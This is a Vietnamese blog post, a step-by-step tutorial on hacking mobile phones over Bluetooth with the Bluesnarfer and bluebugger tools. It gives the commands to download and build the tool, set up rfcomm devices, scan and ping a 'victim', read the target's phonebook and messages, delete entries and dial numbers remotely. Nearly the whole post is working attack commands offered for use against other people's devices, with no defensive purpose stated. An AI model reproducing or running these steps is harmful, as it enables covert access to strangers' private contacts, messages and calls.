Friday, April 15, 2016

Hướng dẩn hack Phones thông qua Bluetooth

Hướng dẩn hack điện thoại qua bluetooth bằng công cụ Bluesnarfer

Chào các bạn mình là EoPi, đã lâu rồi mình không viết bài, hôm nay mình sẽ hướng dẩn các bạn một thủ thuật nhỏ để hack điện thoại thông qua giao thức Bluetooth ^.^.
Khuyên dùng: Kali Linux, Parrot hoặc Backtrack.

Đầu tiên chúng ta cần cài đặc Bluesnarfer

- Trước tiên mở Terminal và dùng lệnh cd /opt để vào thư mục "opt".
- Tiếp theo dùng lệnh wget để tải Bluesnarfer về nhé các bạn, dùng lệnh như sao:
wget http://alighieri.org/tools/bluesnarfer.tar.gz.
- Để kiểm tra đã tải nó xuống chưa các bạn dùng lệnh ls và xem đã hiện bluesnarfer.tar.gz trong thư mục opt chưa, nếu đã có ta tiếp tục giải nén bằng lệnh tar xvf bluesnarfer.tar.gz.
- Dùng lại lệnh ls kiểm tra xem đã có thư mục bluesnarfer trong opt chưa. Nếu đã có hãy dùng lệnh cd bluesnarfer để duy chuyển vào thư mục bluesnarfer.
- Khi vào thư mục bluesnarfer rồi dùng lại lệnh ls xem có những thứ này chưa include  Makefile  README  src, nếu đã có dùng lệnh make để cài đặc nó.
- Để xem tất cả lệnh bluesnarfer ta dùng lệnh ./bluesnarfer .
- Bây giờ chúng ta đã có Bluesnarfer, tiếp theo ta cần cấu hình rfcomm, ta dùng lệnh: mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
mknod –mode=666 /dev/rfcomm0 c 216 0
hciconfig -i hci0 up
hciconfig hci0
- Tiếp theo ta quét victim:
hcitool scan hci0
- Giờ thử ping victim:
l2ping  < địa chỉ MAC của victim>
- Sau đó chúng ta kết nối victim với các kênh rfcomm
sdptool browse –tree –l2cap < địa chỉ MAC >
- Khi đó bạn có thể sử dụng bluesnarfer để remote :3 ví dụ như xem tin nhắn, danh bạ hoặc quay số
Bluesnarfer -r 1-100 -C 7 -b < địa chỉ MAC >
- Để xem những thiết lập ta dùng lệnh:
bluebugger -h
- Để quay số dùng lệnh:
bluebugger -m < tên victim > -c 7 -a < địa chỉ MAC > Dial < sđt >
- Thêm vài lệnh các bạn có thể tự xem thêm
bluesnarfer, version 0.1 –
usage: bluesnarfer [options][ATCMD] -b bt_addrATCMD     : valid AT+CMD (GSM EXTENSION)TYPE      : valid phonebook type ..
example   : “DC” (dialed call list)
“SM” (SIM phonebook)
“RC” (recevied call list)
“XX” much more

-b bdaddr : bluetooth device address
-C chan   : bluetooth rfcomm channel
-c ATCMD  : custom action
-r N-M    : read phonebook entry N to M
-w N-M    : delete phonebook entry N to M
-f name   : search “name” in phonebook address
-s TYPE   : select phonebook memory storage
-l      : list aviable phonebook memory storage
-i      : device info

BÌNH LUẬN (0)